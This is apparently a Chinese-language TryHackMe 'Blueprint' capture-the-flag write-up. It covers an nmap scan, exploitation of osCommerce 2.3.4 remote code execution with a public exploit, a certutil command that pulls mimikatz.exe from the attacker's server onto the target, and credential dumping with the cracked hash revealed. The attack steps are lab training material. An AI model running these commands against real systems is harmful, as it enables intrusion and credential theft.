Blueprint|TryHackMe

Blueprint|TryHackMe

nmap先扫端口

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
┌──(root㉿shangchen)-[~/Desktop]
└─# nmap -sV 10.10.75.95
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-03-19 16:14 CST
Nmap scan report for 10.10.75.95
Host is up (0.30s latency).
Not shown: 987 closed tcp ports (reset)
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 7.5
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
443/tcp open ssl/http Apache httpd 2.4.23 (OpenSSL/1.0.2h PHP/5.6.28)
445/tcp open microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
3306/tcp open mysql MariaDB (unauthorized)
8080/tcp open http Apache httpd 2.4.23 (OpenSSL/1.0.2h PHP/5.6.28)
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49158/tcp open msrpc Microsoft Windows RPC
49159/tcp open msrpc Microsoft Windows RPC
49160/tcp open msrpc Microsoft Windows RPC
Service Info: Hosts: www.example.com, BLUEPRINT, localhost; OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 111.82 seconds

80,443,8080都开着,看一下只有8080端口有个osCommerce-2.3.4

有RCE,打一下

1
2
3
4
5
$ git clone https://github.com/whokilleddb/osCommerce-2.3.4-RCE-exploit
$ cd osCommerce-2.3.4-RCE-exploit
$ cargo build --release

$ oscommerece_exploit -u http://127.0.0.1/oscommerce-2.3.4/catalog/

打通了,但是这看起来不是一个可以连续执行命令的shell(cd之后再看还是原目录)

直接dir从C:开始找,桌面上找到root.txt,哦,逆天命名root.txt.txt

要找到Lab用户的密码哈希,搞不明白,换一个exp

searchsploit oscommerce

起个httpserver,传文件上去

certutil -urlcache -split -f http://10.9.224.253:8888/share/mimikatz.exe mimikatz32.exe

我好像知道了什么。。。这系统32位的之前一直拿64位的在弄笑死了。

hashes.com解出来googleplus

下次一定先看这个

再试试msfvenom,先生成木马

msfconsole起个监听:

上传&执行shell.exe

另一边msfconsole拿到shell

hashdump拿到哈希再去解一下就好了。